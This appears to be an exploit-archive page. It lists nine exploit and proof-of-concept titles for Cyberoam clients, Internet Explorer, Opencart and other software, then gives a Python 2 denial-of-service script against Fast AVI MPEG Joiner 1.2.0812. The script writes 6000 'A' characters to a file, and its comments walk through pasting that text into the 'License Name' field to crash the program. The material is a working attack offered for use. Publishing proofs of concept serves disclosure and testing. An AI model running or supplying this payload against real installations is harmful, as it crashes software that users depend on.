
9 changes to exploits/shellcodes Cyberoam SSLVPN Client 1.3.1.30 - 'Connect To Server' Denial of Service (PoC) Cyberoam SSLVPN Client 1.3.1.30 - 'HTTP Proxy' Denial of Service (PoC) Cyberoam Transparent Authentication Suite 2.1.2.5 - 'Fully Qualified Domain Name' Denial of Service (PoC) Cyberoam Transparent Authentication Suite 2.1.2.5 - 'NetBIOS Name' Denial of Service (PoC) Cyberoam General Authentication Client 2.1.2.7 - 'Server Address' Denial of Service (PoC) Fast AVI MPEG Joiner - 'License Name' Denial of Service (PoC) Axessh 4.2 - 'Log file name' Local Stack-based Buffer Overflow Microsoft Internet Explorer Windows 10 1809 17763.316 - Scripting Engine Memory Corruption Opencart 3.0.3.2 - 'extension/feed/google_base' Denial of Service PoC
29 lines
No EOL
789 B
Python
Executable file
29 lines
No EOL
789 B
Python
Executable file
# Exploit Title: Fast AVI MPEG Joiner Dos Exploit
|
|
# Date: 24.5.2019
|
|
# Vendor Homepage:http://www.alloksoft.com
|
|
# Software Link: http://www.alloksoft.com/fast_avimpegjoiner.exe
|
|
# Exploit Author: Achilles
|
|
# Tested Version: 1.2.0812
|
|
# Tested on: Windows 7 x64 Sp1
|
|
# Windows XP x86 Sp3
|
|
|
|
|
|
# 1.- Run python code :Joiner.py
|
|
# 2.- Open EVIL.txt and copy content to clipboard
|
|
# 3.- Open Fast AVI MPEG Joiner.exe
|
|
# 4.- Paste the content of EVIL.txt into the Field: 'License Name'
|
|
# 5.- Click 'Register'and you will see a crash.
|
|
|
|
|
|
|
|
#!/usr/bin/env python
|
|
buffer = "\x41" * 6000
|
|
|
|
try:
|
|
f=open("Evil.txt","w")
|
|
print "[+] Creating %s bytes evil payload.." %len(buffer)
|
|
f.write(buffer)
|
|
f.close()
|
|
print "[+] File created!"
|
|
except:
|
|
print "File cannot be created" |